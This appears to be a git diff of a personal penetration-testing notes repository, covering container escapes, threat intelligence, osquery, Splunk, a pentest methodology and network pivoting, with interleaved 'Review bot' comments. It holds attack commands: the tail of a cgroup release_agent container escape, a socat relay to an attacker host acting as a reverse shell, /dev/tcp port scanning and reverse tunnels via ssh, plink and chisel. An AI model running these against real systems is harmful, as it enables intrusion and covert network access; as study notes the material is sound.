echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## Dirty c0w
https://github.com/dirtycow/dirtycow.github.io
## runC
[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
## Securing a Container
* Least Privileges
* Seccomp
* Securing Registry via TLS
## Checking if you are inside a container
* Low process count
```sh
ps aux
```
* `.dockerenv` in `/`
```sh
cd / && ls -lah
```
* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```

11
misc/gitTools.md Normal file

@ -0,0 +1,11 @@
# GitTools
* extract commits from repo
```sh
./extractor.sh <repo_with_.git> <targetdir>
```
* List `commit-meta.txt` files from all commits
```sh
separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"
```
* Compare hashes of the commits. The one without a parent is the oldest one.
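Review bot: In the one-liner under "List `commit-meta.txt` files", the `$(cat $i/commit-meta.txt)` output is spliced into printf's format string, so any `%` in a commit message is read as a conversion specifier and garbles or aborts the output; pass the values as arguments instead, `printf '\n\n%s\n\033[4;1m%s\033[0m\n%s\n' "$separator" "$i" "$(cat "$i/commit-meta.txt")"`. The `for i in $(ls)` loop also word-splits directory names containing spaces; the glob form `for i in */` is the safe equivalent and needs no `ls`.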


@ -0,0 +1,47 @@
# Threat Intelligence
Data must be analyzed to be considered threat intelligence. Once analyzed and actionable, then it becomes threat intelligence. The data needs context around to become intel.
__Cyber Thread Intelligence (CTI)__ is a precautionary measure that companies use or contribute to so that other corporations do not get hit with the same attacks. Of course, adversaries change their TTPs all the time so the TI landscape is constantly changing.
Vendors and corporations will sometimes share their collected CTI in what are called __ISACs__ or __Information Sharing and Analysis Centers__. __ISACs__ collect various indicators of an adversary that other corporations can use as a precaution against adversaries.
Threat Intelligence is also broken up into three different types.
* Strategic
* Assist senior management make informed decisions specifically about the security budget and strategies.
* Tactical
* Interacts with the TTPs and attack models to identify adversary attack patterns.
* Operational
* Interact with IOCs and how the adversaries operationalize.
## Advance Persistent Threats (APTs)
* https://www.fireeye.com/current-threats/apt-groups.html
## TTP
TTP is an acronym for Tactics, Techniques, and Procedures, but what does each of these terms mean?
* The __Tactic__ is the adversary's goal or objective.
* The __Technique__ is how the adversary achieves the goal or objective.
* The __Procedure__ is how the technique is executed.
TI is an acronym for Threat Intelligence. Threat Intelligence is an overarching term for all collected information on adversaries and TTPs. You will also commonly hear CTI or Cyber Threat Intelligence which is just another way of saying Threat Intelligence.
## Indicator of Compromise
* __IOCs__ is an acronym for __Indicators of Compromise__, the indicators for malware and adversary groups. Indicators can include file hashes, IPs, names, etc.
## Information Sharing and Analysis Centers (ISACs)
According to the National Council of __ISACs__, "Information Sharing and Analysis Centers (ISACs) are member-driven organizations, delivering all-hazards threat and mitigation information to asset owners and operators". ISACs can be community-centered or vendor-specific. ISACs include CTI from threat actors as well as mitigation information in the form of IOCs, YARA rules, etc. ISACs maintain situational awareness by sharing and collaborating to maintain CTI, through a National Council of ISACs.
* ISACs
* [US-CERT](https://us-cert.cisa.gov/)
* [AlienVault OTX](https://otx.alienvault.com/)
* [ThreatConnect](https://threatconnect.com/)
* [MISP](https://www.misp-project.org/)


@ -0,0 +1,65 @@
# Osquery
* [Documentation](https://osquery.readthedocs.io/en/stable/)
* [Schema Docs](https://osquery.io/schema/4.7.0/)
## Usage
* `.help` is the overiew
### List available tables
```sh
.tables
```
* Specify via `.tables <tablename>`
### Show schema
```sh
.schema <table_name>
```
* Show schema for foreign operating systems via `--enable_foreign`
### Queries
* Select
```sql
select * from <table>;
select * <attr>,<attr> from <table>;
```
* UPDATE and DELETE is possible on run-time tables
* JOIN
```sql
SELECT pid, name, path FROM osquery_info JOIN processes USING (pid);
```
* Where clause operators
* `=` [equal]
* `<>` [not equal]
* `>, >=` [greater than, greater than or equal to]
* `<, <=` [less than or less than or equal to]
* `BETWEEN` [between a range]
* `LIKE` [pattern wildcard searches]
* `%` [wildcard, multiple characters]
* `_` [wildcard, one character]
* Matching wildcard rules
* `%`: Match all files and folders for one level.
* `%%`: Match all files and folders recursively.
* `%abc`: Match all within-level ending in "abc".
* `abc%`: Match all within-level starting with "abc".
## Remote Queries via Frontend
* [Repo](https://github.com/fleetdm/fleet.git)
## Extensions
* [osquery-extensions](https://github.com/trailofbits/osquery-extensions)
* [osq-ext-bin](https://github.com/polylogyx/osq-ext-bin)
### Yara
```sql
select * from yara where sigfile='<sigfile>' and path like '/home/%%';
```
* [Docs](https://osquery.readthedocs.io/en/stable/deployment/yara/)


@ -0,0 +1,18 @@
# Security Information and Event Management (SIEM)
* [Varonis](https://www.varonis.com/blog/what-is-siem/)
* Threat detection
* Investigation
* Time to respond
* Some other SIEM features:
* Basic security monitoring
* Advanced threat detection
* Forensics & incident response
* Log collection
* Normalization
* Notifications and alerts
* Security incident detection
* Threat response workflow


@ -0,0 +1,63 @@
# Splunk
## Splunk Bar
* Messages
* Settings
* Activity
* Help
* Find
## Search & Reporting
* Tip: If you want to land into the Search app upon login automatically, you can do so by editing the user-prefs.conf file.
```sh
C:\Program Files\Splunk\etc\apps\user-prefs\default\user-prefs.conf
/opt/splunk/etc/apps/user-pref/default/user-prefs.conf
```
* [Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthesearchapp)
* [Start searching](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Startsearching)
* [Time range picker](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthetimerangepicker)
* [Field to search](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldstosearch)
* [Use field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldlookups)
* [Search field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Searchwithfieldlookups)
* [Splunk Regex](https://docs.splunk.com/Documentation/Splunk/8.1.2/Knowledge/AboutSplunkregularexpressions)
* Tabs
* Event
* Patterns
* Statistics
* Visualization
## Adding Data
* [Adding Data Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/Data/Getstartedwithgettingdatain#Use_apps_to_get_data_in)
* `Settings > Data > Data Inputs` contains further sources
* Add data after that via `Add Data`
## Queries
* [Metadata](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Metadata)
* [Metalore](https://www.splunk.com/blog/2017/07/31/metadata-metalore.html)
```sh
| metadata type=sourcetypes index=botsv2 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
```
* Examples
* Filtering HTTP sites visited for found IP
```sh
index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" | dedup site | table site
```
## Sigma
* [Sigma Repo](https://github.com/Neo23x0/sigma)
* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches)
* [Conversion](https://uncoder.io/)
* E.g. : `sigma: APT29` as input
## Dashboard
```sh
source="<source>" | top limit=5 EventID
```
* Visualization > choose Chart > "Save As" (top right) > DashboardName
## Alerting
* [Workflow](https://docs.splunk.com/Documentation/SplunkCloud/8.1.2012/Alert/AlertWorkflowOverview)

1
nishang Submodule

@ -0,0 +1 @@
Subproject commit 0090ba2e51b7503c3245081894c0fc87b696f941

42
pentesting.md Normal file

@ -0,0 +1,42 @@
# Methodology
* Steps
* Reconnaissance
* Enumeration/Scanning
* Gaining Access
* Privilege Escalation
* Covering Tracks
* Reporting
## Reconnaissance
* Duck / SearX / metacrawler / google
* Wikipedia
* [Shodan.io](http://www.shodan.io)
* PeopleFinder.com
* who.is
* sublist3r
* hunter.io
* builtwith.com
* wappalyzer
## Enumeration
* nmap
* nikto
* gobuster
* dirbuster
* metasploit
* enum4linux / linpeas / winpeas / linenum
## Exploitation
## Privilege Escalation
## Covering Tracks
## Reporting
* Includes
* Vulnerabilities
* Criticality
* Description
* Countermeasures
* Finding summary

144
pivoting.md Normal file

@ -0,0 +1,144 @@
# Pivoting
* Tunnelling/Proxying
* Port Forwarding
## Enumeration
### Using material found on the machine and preinstalled tools
* `arp -a`
* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
* `/etc/resolv.conf`
* `ipconfig /all`
* `nmcli dev show`
### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
### Scripting Techniques
```sh
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
```
* Using local tools through a proxy like `nmap`
## Tools
### Enumerating a network using native and statically compiled tools
### Proxychains / FoxyProxy
* Proxychains
```sh
proxychains nc <IP> <PORT>
```
* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
```
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 9050
# proxy_dns
```
* FoxyProxy
### SSH port forwarding and tunnelling (primarily Unix)
* LocalPortForwarding
```sh
ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
```
* Dynamic Port Forwarding
```sh
ssh -D <Port> <user>@<Jumpserver> -fN
```
* Reverse Proxy
```sh
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
```
### plink.exe (Windows)
* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
```sh
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
```
* Key generation
```sh
puttygen <keyfile> -o key.ppk
```
### Socat
* Reverse shell on target via
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
```
* Attacking bind shell
```sh
sudo nc -lvnp 443
```
* Relay via Jumpserver
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Quiet Port Forwarding
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
### Chisel
* **Does not require SSH on target**
* Reverse Proxy
* Bind port on attacker
```sh
./chisel server -p <ListeningPort> --reverse &
```
* Reverse port on target/proxy
```sh
./chisel client <attacker-IP>:<attacker-Port> R:socks &
```
* `proxychains.conf` contains
```sh
[ProxyList]
socks5 127.0.0.1 <Listening-Port>
```
* Forward SOCKS Proxy
* Proxy/compromised machine
```sh
./chisel server -p <Listen-Port> --socks5
```
* On attacker
```sh
./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
```
* Remote Port Forward
* On attacker
```sh
./chisel server -p <Listen-Port> --reverse &
```
* On forwarder
```sh
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
```
* Local Port Forwarding
* On proxy
```sh
./chisel server -p <Listen-Port>
```
* On attacker
```sh
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
```
### sshuttle
* `pip install sshuttle`
* `sshuttle -r <user>@<target> <subnet/CIDR>`
* or automatically determined
```sh
sshuttle -r <user>@<target> -N
```
* Key based auth
```sh
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
```
* Exclude servers via `-x`, for example the target/gateway server
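Review bot: The first line of the "Scripting Techniques" block never uses its loop variable: `192.168.0.${1}` expands the shell's first positional parameter (empty in an interactive shell), so all 255 iterations ping the same malformed address; it should read `192.168.0.${i}`, matching the `$i` used in the second line. Separately, the heading `### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)` is missing the opening `[` of the markdown link, so it renders as literal text rather than a link.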

@ -0,0 +1 @@
Subproject commit ce332b5b08d7249c21e121697b7b48d6414c2a18

@ -0,0 +1 @@
Subproject commit 0dc0ff255a4bb07d2c2664ef6220137f7e40bb75


@ -0,0 +1,4 @@
# Command and Control
* [Matrix](https://www.thec2matrix.com/)
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4
